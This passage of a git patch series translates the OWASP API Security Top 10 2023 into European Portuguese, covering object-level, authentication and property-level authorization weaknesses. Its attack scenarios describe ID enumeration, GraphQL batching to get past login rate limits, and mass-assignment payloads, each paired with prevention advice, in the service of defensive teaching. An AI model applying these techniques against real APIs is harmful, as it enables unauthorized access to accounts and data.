@@ -54,7 +54,7 @@ The API fails to validate that the VIN represents a vehicle that belongs to the logged in user, which leads to a BOLA vulnerability. An attacker can access vehicles that don't belong to him. -### Scenario #3 +### Cenário #3 An online document storage service allows users to view, edit, store and delete their documents. When a user's document is deleted, a GraphQL mutation with the @@ -78,7 +78,7 @@ POST /graphql Since the document with the given ID is deleted without any further permission checks, a user may be able to delete another user's document. -## How To Prevent +## Como Prevenir * Implement a proper authorization mechanism that relies on the user policies and hierarchy. @@ -89,14 +89,14 @@ checks, a user may be able to delete another user's document. * Write tests to evaluate the vulnerability of the authorization mechanism. Do not deploy changes that make the tests fail. -## References +## Referências ### OWASP * [Authorization Cheat Sheet][1] * [Authorization Testing Automation Cheat Sheet][2] -### External +### Externas * [CWE-285: Improper Authorization][3] * [CWE-639: Authorization Bypass Through User-Controlled Key][4] From e4178b06fb3f87a6d04fc616b79481195153266d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 16:50:13 +0100 Subject: [PATCH 19/64] Update 0xa1-broken-object-level-authorization.md --- .../0xa1-broken-object-level-authorization.md | 64 ++++++++++--------- 1 file changed, 35 insertions(+), 29 deletions(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 14f5f6e91..15541ad14 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md 
@@ -34,31 +34,33 @@ através da manipulação do ID. Se um atacante conseguir aceder a um ### Cenário #1 -An e-commerce platform for online stores (shops) provides a listing page with -the revenue charts for their hosted shops. Inspecting the browser requests, an -attacker can identify the API endpoints used as a data source for those charts -and their pattern: `/shops/{shopName}/revenue_data.json`. Using another API -endpoint, the attacker can get the list of all hosted shop names. With a -simple script to manipulate the names in the list, replacing `{shopName}` in -the URL, the attacker gains access to the sales data of thousands of e-commerce -stores. +Uma plataforma de comércio eletrónico para criar lojas online oferece uma página +de listagem com gráficos relativos à receita das lojas. Inspecionando os pedidos +realizados pelo navegador um atacante identifica os _endpoints_ da API usados +para obter os dados a partir dos quais são gerados os gráficos bem como o seu +padrão `/shops/{shopName}/revenue_data.json`. Utilizado outro _endpoint_ da API +o atacante obtém a lista com o nome de todas as lojas. Com recurso a um _script_ +simples para substituir `{shopName}` no URL pelos nomes que constam da lista, o +atacante consegue acesso aos dados relativos às vendas de milhares de lojas +online. ### Cenário #2 -An automobile manufacturer has enabled remote control of its vehicles via a -mobile API for communication with the driver's mobile phone. The API enables -the driver to remotely start and stop the engine and lock and unlock the doors. -As part of this flow, the user sends the Vehicle Identification Number (VIN) to -the API. -The API fails to validate that the VIN represents a vehicle that belongs to the -logged in user, which leads to a BOLA vulnerability. An attacker can access -vehicles that don't belong to him. +Um fabricante de automóveis habilitou o controlo remoto dos seus veículos +através de uma API para comunicação com o telemóvel do condutor. 
A API +permite ao condutor iniciar e parar o motor e trancar e destrancar as portas +remotamente. Como parte deste processo, o utilizador envia o Número de +Identificação do Veículo (VIN) para a API. +No entanto, a API não valida se o VIN representa um veículo que pertence ao +utilizador autenticado, o que resulta numa vulnerabilidade de BOLA. Um atacante +pode aceder a veículos que não lhe pertencem. ### Cenário #3 -An online document storage service allows users to view, edit, store and delete -their documents. When a user's document is deleted, a GraphQL mutation with the -document ID is sent to the API. +Um serviço de armazenamento de documentos online permite aos utilizadores +visualizar, editar, armazenar e eliminar os seus documentos. Quando um +documento de um utilizador é eliminado, é enviada uma mutação GraphQL com o ID +do documento para a API. ``` POST /graphql 
@@ -75,19 +77,23 @@ POST /graphql } ``` -Since the document with the given ID is deleted without any further permission -checks, a user may be able to delete another user's document. +Uma vez que o documento com o ID fornecido é eliminado sem quaisquer +verificações adicionais de permissão, um utilizador pode conseguir eliminar o +documento de outro utilizador. ## Como Prevenir -* Implement a proper authorization mechanism that relies on the user policies - and hierarchy. -* Use the authorization mechanism to check if the logged-in user has access to - perform the requested action on the record in every function that uses an - input from the client to access a record in the database. -* Prefer the use of random and unpredictable values as GUIDs for records' IDs. -* Write tests to evaluate the vulnerability of the authorization mechanism. Do - not deploy changes that make the tests fail. +* Implementar um mecanismo de autorização baseado nas políticas de utilizador e + hierarquia. +* Utilizar um mecanismo de autorização para verificar se o utilizador com sessão + ativa tem permissão para realizar a ação pretendida sobre o registo. Esta + verificação deve ser feita por todas as funções que utilizem informação + fornecida pelo cliente para aceder a um registo na base de dados. +* Utilizar preferencialmente valores aleatórios e não previsíveis (e.g., GUID) + como identificador para os registos. +* Escrever testes para avaliar o correto funcionamento do mecanismo de + autorização. Não colocar em produção alterações vulneráveis que não passem nos + testes. ## Referências From 962c79f040f0b05200af79ea6a78e16a6a5986af Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 17:23:27 +0100 Subject: [PATCH 20/64] Update 0xa2-broken-authentication.md --- .../2023/pt-pt/0xa2-broken-authentication.md | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) 
diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md
index a02822f90..a19710a14 100644
--- a/editions/2023/pt-pt/0xa2-broken-authentication.md
+++ b/editions/2023/pt-pt/0xa2-broken-authentication.md
@@ -1,11 +1,11 @@ # API2:2023 Broken Authentication -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific | -| The authentication mechanism is an easy target for attackers since it's exposed to everyone. Although more advanced technical skills may be required to exploit some authentication issues, exploitation tools are generally available. | Software and security engineers’ misconceptions regarding authentication boundaries and inherent implementation complexity make authentication issues prevalent. Methodologies of detecting broken authentication are available and easy to create. | Attackers can gain complete control of other users’ accounts in the system, read their personal data, and perform sensitive actions on their behalf. Systems are unlikely to be able to distinguish attackers’ actions from legitimate user ones. | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | +| O mecanismo de autenticação é um alvo fácil para os atacantes, uma vez que está exposto a todos. Embora possam ser necessárias competências técnicas mais avançadas para explorar alguns problemas de autenticação, geralmente existem ferramentas de exploração disponíveis. | As conceções erradas dos engenheiros de software e de segurança sobre os limites da autenticação e a complexidade inerente da implementação tornam os problemas de autenticação prevalentes. Metodologias para detetar *broken authentication* estão disponíveis e são fáceis de criar. | Os atacantes podem obter controlo total das contas de outros utilizadores no sistema, ler os seus dados pessoais e realizar ações sensíveis em seu nome. 
Os sistemas têm pouca probabilidade de conseguir distinguir as ações dos atacantes das ações legítimas dos utilizadores. | -## Is the API Vulnerable? +## A API é vulnerável? Authentication endpoints and flows are assets that need to be protected. Additionally, "Forgot password / reset password" should be treated the same way @@ -35,7 +35,7 @@ On top of that, a microservice is vulnerable if: ## Example Attack Scenarios -## Scenario #1 +## Cenário #1 In order to perform user authentication the client has to issue an API request like the one below with the user credentials: @@ -70,7 +70,7 @@ POST /graphql ] ``` -## Scenario #2 +## Cenário #2 In order to update the email address associated with a user's account, clients should issue an API request like the one below: @@ -88,7 +88,7 @@ steal the auth token might be able to take over the victim's account by starting the reset password workflow after updating the email address of the victim's account. -## How To Prevent +## Como Prevenir * Make sure you know all the possible flows to authenticate to the API (mobile/ web/deep links that implement one-click authentication/etc.). Ask @@ -112,7 +112,7 @@ account. * API keys should not be used for user authentication. They should only be used for [API clients][3] authentication. -## References +## Referências ### OWASP @@ -120,7 +120,7 @@ account. * [Key Management Cheat Sheet][4] * [Credential Stuffing][5] -### External +### Externas * [CWE-204: Observable Response Discrepancy][6] * [CWE-307: Improper Restriction of Excessive Authentication Attempts][7] From 29a93235a9de4b5a781f8a8d9d7d336d0fd9ed85 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 17:50:38 +0100 Subject: [PATCH 21/64] Update 0xa2-broken-authentication.md --- .../2023/pt-pt/0xa2-broken-authentication.md | 72 ++++++++++--------- 1 file changed, 37 insertions(+), 35 deletions(-) 
diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md
index a19710a14..d9d480d46 100644
--- a/editions/2023/pt-pt/0xa2-broken-authentication.md
+++ b/editions/2023/pt-pt/0xa2-broken-authentication.md
@@ -7,38 +7,39 @@ ## A API é vulnerável? -Authentication endpoints and flows are assets that need to be protected. -Additionally, "Forgot password / reset password" should be treated the same way -as authentication mechanisms. - -An API is vulnerable if it: - -* Permits credential stuffing where the attacker uses brute force with a list - of valid usernames and passwords. -* Permits attackers to perform a brute force attack on the same user account, - without presenting captcha/account lockout mechanism. -* Permits weak passwords. -* Sends sensitive authentication details, such as auth tokens and passwords in - the URL. -* Allows users to change their email address, current password, or do any other - sensitive operations without asking for password confirmation. -* Doesn't validate the authenticity of tokens. -* Accepts unsigned/weakly signed JWT tokens (`{"alg":"none"}`) -* Doesn't validate the JWT expiration date. -* Uses plain text, non-encrypted, or weakly hashed passwords. -* Uses weak encryption keys. - -On top of that, a microservice is vulnerable if: - -* Other microservices can access it without authentication -* Uses weak or predictable tokens to enforce authentication - -## Example Attack Scenarios +Os _endpoints_ e fluxos de autenticação são ativos que carecem de proteção. +Além disso, mecanismos de recuperação de _password_ devem ser tratados da mesma +forma que os mecanismos de autenticação. + +Uma API é vulnerável se: + +* Permite ataques de _credential stuffing_, onde o atacante utiliza força bruta + com uma lista de nomes de utilizador e palavras-passe válidos. +* Permite ataques de força bruta a uma conta de utilizador específica, não + implementando mecanismos de mitigação como _captcha_ ou bloqueio da conta por + excesso de tentativas de autenticação falhadas. +* Permite a utilização de _passwords_ fracas. +* Envia informação de autenticação, tal como _tokens_ e _passwords_, no URL. 
+* Permite que os utilizadores alterem o seu endereço de email, _password_ atual ou + realizem outras operações sensíveis sem pedir a confirmação da _password_. +* Não valida a autenticidade dos _tokens_ de autenticação. +* Aceita _tokens_ JWT sem que estes sejam assinados/usando algoritmos fracos + `("alg":"none")` +* Não valida a data de expiração dos _tokens_ JWT. +* Utiliza _passwords_ em texto, não encriptadas, ou resumos fracos. +* Utiliza chaves de encriptação fracas. + +Além disso, um microsserviço é vulnerável se: + +* Outros microsserviços podem aceder a ele sem autenticação +* Utiliza tokens fracos ou previsíveis para impor autenticação + +## Exemplos de Cenários de Ataque ## Cenário #1 -In order to perform user authentication the client has to issue an API request -like the one below with the user credentials: +Para realizar a autenticação do utilizador, o cliente tem de enviar um pedido +de API como o exemplo abaixo, com as credenciais do utilizador: ``` POST /graphql @@ -51,13 +52,14 @@ POST /graphql } ``` -If credentials are valid, then an auth token is returned which should be -provided in subsequent requests to identify the user. Login attempts are -subject to restrictive rate limiting: only three requests are allowed per -minute. +Se as credenciais forem válidas, é devolvido um token de autenticação que +deve ser fornecido em pedidos subsequentes para identificar o utilizador. +A quantidade de tentativas de login está sujeita a uma limitação temporal +restritiva: apenas três pedidos são permitidos por minuto. -To brute force log in with a victim's account, bad actors leverage GraphQL -query batching to bypass the request rate limiting, speeding up the attack: +Para efetuar login por força bruta com a conta de uma vítima, os atores +maliciosos aproveitam o agrupamento de consultas GraphQL para contornar a +limitação temporal restritiva de pedidos, acelerando o ataque: ``` POST /graphql 
From 1216010ef43c4b4b8c6f46114e7b0b0c41fd338d Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 20:40:59 +0100 Subject: [PATCH 22/64] Update 0xa2-broken-authentication.md --- .../2023/pt-pt/0xa2-broken-authentication.md | 60 ++++++++++--------- 1 file changed, 32 insertions(+), 28 deletions(-) diff --git a/editions/2023/pt-pt/0xa2-broken-authentication.md b/editions/2023/pt-pt/0xa2-broken-authentication.md index d9d480d46..46525ca39 100644 --- a/editions/2023/pt-pt/0xa2-broken-authentication.md +++ b/editions/2023/pt-pt/0xa2-broken-authentication.md @@ -74,8 +74,8 @@ POST /graphql ## Cenário #2 -In order to update the email address associated with a user's account, clients -should issue an API request like the one below: +Para atualizar o endereço de email associado à conta de um utilizador, os +clientes devem enviar um pedido API como o exemplo abaixo: ``` PUT /account 
@@ -84,35 +84,39 @@ Authorization: Bearer { "email": "" } ``` -Because the API does not require users to confirm their identity by providing -their current password, bad actors able to put themselves in a position to -steal the auth token might be able to take over the victim's account by starting -the reset password workflow after updating the email address of the victim's -account. +Devido à API não exigir que os utilizadores confirmem a sua identidade +fornecendo a sua _password_ atual, atores maliciosos que consigam colocar-se numa +posição de roubar o token de autenticação podem conseguir assumir a conta da +vítima ao iniciar o processo de redefinição de senha após atualizar o endereço +de email da conta da vítima. ## Como Prevenir -* Make sure you know all the possible flows to authenticate to the API - (mobile/ web/deep links that implement one-click authentication/etc.). Ask - your engineers what flows you missed. -* Read about your authentication mechanisms. Make sure you understand what and - how they are used. OAuth is not authentication, and neither are API keys. -* Don't reinvent the wheel in authentication, token generation, or password - storage. Use the standards. -* Credential recovery/forgot password endpoints should be treated as login - endpoints in terms of brute force, rate limiting, and lockout protections. -* Require re-authentication for sensitive operations (e.g. changing the account - owner email address/2FA phone number). -* Use the [OWASP Authentication Cheatsheet][1]. -* Where possible, implement multi-factor authentication. -* Implement anti-brute force mechanisms to mitigate credential stuffing, - dictionary attacks, and brute force attacks on your authentication endpoints. - This mechanism should be stricter than the regular rate limiting mechanisms - on your APIs. -* Implement [account lockout][2]/captcha mechanisms to prevent brute force - attacks against specific users. Implement weak-password checks. 
-* API keys should not be used for user authentication. They should only be used - for [API clients][3] authentication. +* Certifique-se de que conhece todos os fluxos de autenticação possíveis (e.g. + móvel/web/_deeplinks_/etc.). Pergunte aos engenheiros responsáveis quais os + fluxos em falta/não identificados. +* Leia sobre os mecanismos de autenticação em uso. Certifique-se que compreende + quais e como são usados. OAuth não é um mecanismo de autenticação, assim como + também não o são as API _keys_. +* Não reinvente a roda em termos de autenticação, geração de _tokens_, + armazenamento de _passwords_. Opte pela utilização de standards. +* _Endpoints_ para recuperação de _password_ devem ser tratados como os + _endpoints_ de _login_ no que diz respeito à proteção contra ataques de força + bruta, limitação do número de pedidos e bloqueio de conta. +* Exija nova autenticação para operações sensíveis (por exemplo, alterar o + endereço de email do proprietário da conta/número de telefone para + autenticação de dois fatores). +* Utilize a [OWASP Authentication Cheatsheet][1]. +* Sempre que possível implemente autenticação de múltiplos fatores. +* Implemente mecanismos anti-força bruta para mitigar ataques do tipo + _credential stuffing_, dicionário e força bruta nos _endpoints_ de + autenticação. Este mecanismo deve ter configurações mais restritivas do que + para os demais _endpoints_ da API. +* Implemente [mecanismos de bloqueio de conta][2] / _captcha_ para prevenir + ataques de força bruta contra utilizadores específicos. Implemente verificação + da qualidade/força das _passwords_. +* As API _keys_ não devem ser usadas para autenticação dos utilizadores. Apenas + devem ser usadas para autenticação dos [clientes da API][3]. ## Referências From 50e0dc8ff76efbd40effd1c8077143549177340f Mon Sep 17 00:00:00 2001 
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 21:04:36 +0100 Subject: [PATCH 23/64] Update 0xa3-broken-object-property-level-authorization.md --- ...ken-object-property-level-authorization.md | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 172e75d3b..3384ab4ab 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md 
@@ -1,17 +1,17 @@ # API3:2023 Broken Object Property Level Authorization -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Moderate** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Moderado** : Específico Negócio | | APIs tend to expose endpoints that return all object’s properties. This is particularly valid for REST APIs. For other protocols such as GraphQL, it may require crafted requests to specify which properties should be returned. Identifying these additional properties that can be manipulated requires more effort, but there are a few automated tools available to assist in this task. | Inspecting API responses is enough to identify sensitive information in returned objects’ representations. Fuzzing is usually used to identify additional (hidden) properties. Whether they can be changed is a matter of crafting an API request and analyzing the response. Side-effect analysis may be required if the target property is not returned in the API response. | Unauthorized access to private/sensitive object properties may result in data disclosure, data loss, or data corruption. Under certain circumstances, unauthorized access to object properties can lead to privilege escalation or partial/full account takeover. | -## Is the API Vulnerable? +## A API é vulnerável? When allowing a user to access an object using an API endpoint, it is important to validate that the user has access to the specific object properties they are trying to access. -An API endpoint is vulnerable if: +Um _endpoint_ de uma API é vulnerável se: * The API endpoint exposes properties of an object that are considered sensitive and should not be read by the user. (previously named: "[Excessive 
@@ -20,9 +20,9 @@ An API endpoint is vulnerable if: sensitive object's property which the user should not be able to access (previously named: "[Mass Assignment][2]") -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 A dating app allows a user to report other users for inappropriate behavior. As part of this flow, the user clicks on a "report" button, and the following @@ -54,7 +54,7 @@ The API Endpoint is vulnerable since it allows the authenticated user to have access to sensitive (reported) user object properties, such as "fullName" and "recentLocation" that are not supposed to be accessed by other users. -### Scenario #2 +### Cenário #2 An online marketplace platform, that offers one type of users ("hosts") to rent out their apartment to another type of users ("guests"), requires the host to @@ -85,7 +85,7 @@ The API endpoint is vulnerable because there is no validation that the host should have access to the internal object property - `total_stay_price`, and the guest will be charged more than she was supposed to be. -### Scenario #3 +### Cenário #3 A social network that is based on short videos, enforces restrictive content filtering and censorship. Even if an uploaded video is blocked, the user can @@ -114,7 +114,7 @@ should have access to the internal object property - `blocked`, and the user can change the value from `true` to `false` and unlock their own blocked content. -## How To Prevent +## Como Prevenir * When exposing an object using an API endpoint, always make sure that the user should have access to the object's properties you expose. @@ -131,7 +131,7 @@ content. * Keep returned data structures to the bare minimum, according to the business/functional requirements for the endpoint. -## References +## Referências ### OWASP 
@@ -139,7 +139,7 @@ content. * [API6:2019 - Mass Assignment - OWASP API Security Top 10 2019][2] * [Mass Assignment Cheat Sheet][3] -### External +### Externas * [CWE-213: Exposure of Sensitive Information Due to Incompatible Policies][4] * [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes][5] From 4e3e338d5146e9548fb82873023bca39dea1d06c Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 10:59:16 +0100 Subject: [PATCH 24/64] Update 0xa3-broken-object-property-level-authorization.md --- .../pt-pt/0xa3-broken-object-property-level-authorization.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 3384ab4ab..8693910f6 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md 
@@ -3,7 +3,7 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Moderado** : Específico Negócio | -| APIs tend to expose endpoints that return all object’s properties. This is particularly valid for REST APIs. For other protocols such as GraphQL, it may require crafted requests to specify which properties should be returned. Identifying these additional properties that can be manipulated requires more effort, but there are a few automated tools available to assist in this task. | Inspecting API responses is enough to identify sensitive information in returned objects’ representations. Fuzzing is usually used to identify additional (hidden) properties. Whether they can be changed is a matter of crafting an API request and analyzing the response. Side-effect analysis may be required if the target property is not returned in the API response. | Unauthorized access to private/sensitive object properties may result in data disclosure, data loss, or data corruption. Under certain circumstances, unauthorized access to object properties can lead to privilege escalation or partial/full account takeover. | +| As APIs tendem a expor _endpoints_ que devolvem todas as propriedades do objeto. Isto é especialmente válido para APIs REST. Para outros protocolos como o GraphQL, pode ser necessário enviar pedidos elaborados para especificar que propriedades devem ser devolvidas. Identificar estas propriedades adicionais que podem ser manipuladas requer mais esforço, mas existem algumas ferramentas automatizadas disponíveis para ajudar nesta tarefa. | Inspecionar as respostas da API é suficiente para identificar informações sensíveis nas representações dos objetos devolvidos. _Fuzzing_ é geralmente usado para identificar propriedades adicionais (ocultas). Determinar se podem ser alteradas depende da elaboração de um pedido à API e da análise da resposta. 
Pode ser necessária uma análise de efeitos secundários se a propriedade alvo não for devolvida na resposta da API. | O acesso não autorizado a propriedades privadas/sensíveis de objetos pode resultar na divulgação de dados, perda de dados ou corrupção de dados. Em certas circunstâncias, o acesso não autorizado a propriedades de objetos pode levar a elevação de privilégios ou a apropriação parcial/completa de conta. | ## A API é vulnerável? From 64f3cd00630c0c2444d49ac0d6b0ff7b43edf658 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 11:41:13 +0100 Subject: [PATCH 25/64] Update 0xa3-broken-object-property-level-authorization.md --- ...ken-object-property-level-authorization.md | 51 ++++++++++--------- 1 file changed, 26 insertions(+), 25 deletions(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 8693910f6..3ef104c2b 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md 
@@ -7,26 +7,26 @@ ## A API é vulnerável? -When allowing a user to access an object using an API endpoint, it is important -to validate that the user has access to the specific object properties they are -trying to access. +Ao permitir que um utilizador aceda a um objeto através de um _endpoint_ da +API, é importante validar que o utilizador tem acesso às propriedades +específicas do objeto que está a tentar aceder. Um _endpoint_ de uma API é vulnerável se: -* The API endpoint exposes properties of an object that are considered - sensitive and should not be read by the user. (previously named: "[Excessive - Data Exposure][1]") -* The API endpoint allows a user to change, add/or delete the value of a - sensitive object's property which the user should not be able to access - (previously named: "[Mass Assignment][2]") +* O _endpoint_ da API expõe propriedades de um objeto que são consideradas + sensíveis e não devem ser lidas pelo utilizador. (anteriormente denominado: + "[Excessive Data Exposure][1]") +* O _endpoint_ da API permite que um utilizador altere, adicione ou elimine o + valor de uma propriedade sensível de um objeto ao qual o utilizador não deve + ter acesso. (anteriormente denominado: "[Mass Assignment][2]") ## Exemplos de Cenários de Ataque ### Cenário #1 -A dating app allows a user to report other users for inappropriate behavior. -As part of this flow, the user clicks on a "report" button, and the following -API call is triggered: +Uma aplicação de encontros permite a um utilizador denunciar outros utilizadores +por comportamento inadequado. Como parte deste processo, o utilizador clica num +botão de 'denúncia', e é desencadeada a seguinte chamada de API: ``` POST /graphql 
@@ -50,18 +50,20 @@ POST /graphql } ``` -The API Endpoint is vulnerable since it allows the authenticated user to have -access to sensitive (reported) user object properties, such as "fullName" and -"recentLocation" that are not supposed to be accessed by other users. +O endpoint da API é vulnerável porque permite que o utilizador autenticado +tenha acesso a propriedades sensíveis do utilizador denunciado, como +"fullName" (nome completo) e "recentLocation" (localização recente), que não +deveriam estar accessíveis a outros utilizadores. ### Cenário #2 -An online marketplace platform, that offers one type of users ("hosts") to rent -out their apartment to another type of users ("guests"), requires the host to -accept a booking made by a guest, before charging the guest for the stay. +Uma plataforma de mercado online, que permite a um tipo de utilizadores +('anfitriões') alugar o seu apartamento a outro tipo de utilizadores +('hóspedes'), requer que o anfitrião aceite uma reserva feita por um +hóspede antes de cobrar ao hóspede pela estadia. -As part of this flow, an API call is sent by the host to -`POST /api/host/approve_booking` with the following legitimate payload: +Como parte deste processo, é feito um pedido de API pelo anfitrião para +`POST /api/host/approve_booking` com o seguinte conteúdo legítimo: ``` { @@ -70,8 +72,7 @@ As part of this flow, an API call is sent by the host to } ``` -The host replays the legitimate request, and adds the following malicious -payload: +O anfitrião reenvia o pedido legítimo e adiciona o seguinte conteúdo malicioso: ``` { 
@@ -81,9 +82,9 @@ payload: } ``` -The API endpoint is vulnerable because there is no validation that the host -should have access to the internal object property - `total_stay_price`, and -the guest will be charged more than she was supposed to be. +O _endpoint_ da API é vulnerável porque não há validação de que o anfitrião +deve ter acesso à propriedade interna do objeto - `total_stay_price`, e o +hóspede vai ser cobrado mais do que deveria. ### Cenário #3 From 3fe0b5cff791b286ba1318bf865669bf4fc58999 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 15:42:43 +0100 Subject: [PATCH 26/64] Update 0xa3-broken-object-property-level-authorization.md --- ...ken-object-property-level-authorization.md | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md index 3ef104c2b..b82db1bdb 100644 --- a/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md +++ b/editions/2023/pt-pt/0xa3-broken-object-property-level-authorization.md @@ -88,9 +88,10 @@ hóspede vai ser cobrado mais do que deveria. ### Cenário #3 -A social network that is based on short videos, enforces restrictive content -filtering and censorship. Even if an uploaded video is blocked, the user can -change the description of the video using the following API request: +Uma rede social baseada em vídeos curtos, impõe filtros restritivos de +conteúdo e censura. Mesmo que um vídeo carregado seja bloqueado, o +utilizador pode alterar a descrição do vídeo utilizando o seguinte pedido à +API: ``` PUT /api/video/update_video 
@@ -100,8 +101,8 @@ PUT /api/video/update_video } ``` -A frustrated user can replay the legitimate request, and add the following -malicious payload: +Um utilizador frustrado pode reenviar o pedido legítimo e adicionar o +seguinte conteúdo malicioso: ``` { 
@@ -110,27 +111,27 @@ malicious payload: } ``` -The API endpoint is vulnerable because there is no validation if the user -should have access to the internal object property - `blocked`, and the user -can change the value from `true` to `false` and unlock their own blocked -content. +O _endpoint_ da API é vulnerável porque não há validação se o utilizador +deve ter acesso à propriedade interna do objeto - `blocked`, e o utilizador +pode alterar o valor de `true` para `false` e desbloquear o seu próprio +conteúdo bloqueado. ## Como Prevenir -* When exposing an object using an API endpoint, always make sure that the user - should have access to the object's properties you expose. -* Avoid using generic methods such as `to_json()` and `to_string()`. Instead, - cherry-pick specific object properties you specifically want to return. -* If possible, avoid using functions that automatically bind a client's input - into code variables, internal objects, or object properties - ("Mass Assignment"). -* Allow changes only to the object's properties that should be updated by the - client. -* Implement a schema-based response validation mechanism as an extra layer of - security. As part of this mechanism, define and enforce data returned by all - API methods. -* Keep returned data structures to the bare minimum, according to the - business/functional requirements for the endpoint. +* Ao expor um objeto através de um _endpoint_ da API, certifique-se sempre + de que o utilizador deve ter acesso às propriedades do objeto que expõe. +* Evite usar métodos genéricos como `to_json()` e `to_string()`. Em vez disso, + selecione especificamente as propriedades do objeto que deseja retornar. +* Se possível, evite usar funções que automaticamente vinculem os dados + provenientes do cliente em variáveis de código, objetos internos ou + propriedades de objetos ("Mass Assignment"). +* Permita alterações apenas nas propriedades do objeto que devam ser + atualizadas pelo cliente. 
+* Implemente um mecanismo de validação de resposta baseado num esquema como + uma camada extra de segurança. Como parte deste mecanismo, defina e imponha + que dados são retornados por todos os métodos da API. +* Mantenha as estruturas de dados retornadas ao mínimo essencial, de acordo + com os requisitos comerciais/funcionais para o _endpoint_. ## Referências From 6ae5633eefce5664013f495b5d9e34124a14257a Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:21:24 +0100 Subject: [PATCH 27/64] Update 0xa5-broken-function-level-authorization.md --- .../2023/pt-pt/0xa5-broken-function-level-authorization.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md index 0bb3f432d..72f3b21cb 100644 --- a/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md +++ b/editions/2023/pt-pt/0xa5-broken-function-level-authorization.md 
@@ -1,8 +1,8 @@ # API5:2023 Broken Function Level Authorization -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Common** : Detectability **Easy** | Technical **Severe** : Business Specific | +| Específico da API : Abuso **Fácil** | Prevalência **Comum** : Deteção **Fácil** | Técnico **Grave** : Específico Negócio | | Exploitation requires the attacker to send legitimate API calls to an API endpoint that they should not have access to as anonymous users or regular, non-privileged users. Exposed endpoints will be easily exploited. | Authorization checks for a function or resource are usually managed via configuration or code level. Implementing proper checks can be a confusing task since modern applications can contain many types of roles, groups, and complex user hierarchies (e.g. sub-users, or users with more than one role). It's easier to discover these flaws in APIs since APIs are more structured, and accessing different functions is more predictable. | Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack and may lead to data disclosure, data loss, or data corruption. Ultimately, it may lead to service disruption. | ## Is the API Vulnerable? From c51bd08b9ccc6ca89020dd92604e816544cb72a1 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Thu, 25 Apr 2024 17:24:36 +0100 Subject: [PATCH 28/64] Update 0xa4-unrestricted-resource-consumption.md --- .../0xa4-unrestricted-resource-consumption.md | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git 